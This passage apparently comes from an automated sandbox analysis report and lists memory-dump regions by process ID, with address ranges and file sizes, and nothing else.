                                                                                                                                                  • memory/4408-203-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4468-202-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4616-205-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4664-167-0x0000000005360000-0x000000000537E000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    120KB

                                                                                                                                                  • memory/4664-161-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4664-162-0x0000000003DA0000-0x0000000003DD6000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    216KB

                                                                                                                                                  • memory/4664-163-0x0000000004410000-0x0000000004A38000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    6.2MB

                                                                                                                                                  • memory/4664-164-0x00000000043B0000-0x00000000043D2000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    136KB

                                                                                                                                                  • memory/4664-165-0x0000000004CB0000-0x0000000004D16000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/4664-166-0x0000000004D20000-0x0000000004D86000-memory.dmp

                                                                                                                                                    Filesize

                                                                                                                                                    408KB

                                                                                                                                                  • memory/4756-181-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4816-154-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4824-214-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4844-209-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4848-187-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4848-144-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4880-206-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/4912-171-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/5036-148-0x0000000000000000-mapping.dmp

                                                                                                                                                  • memory/5088-204-0x0000000000000000-mapping.dmp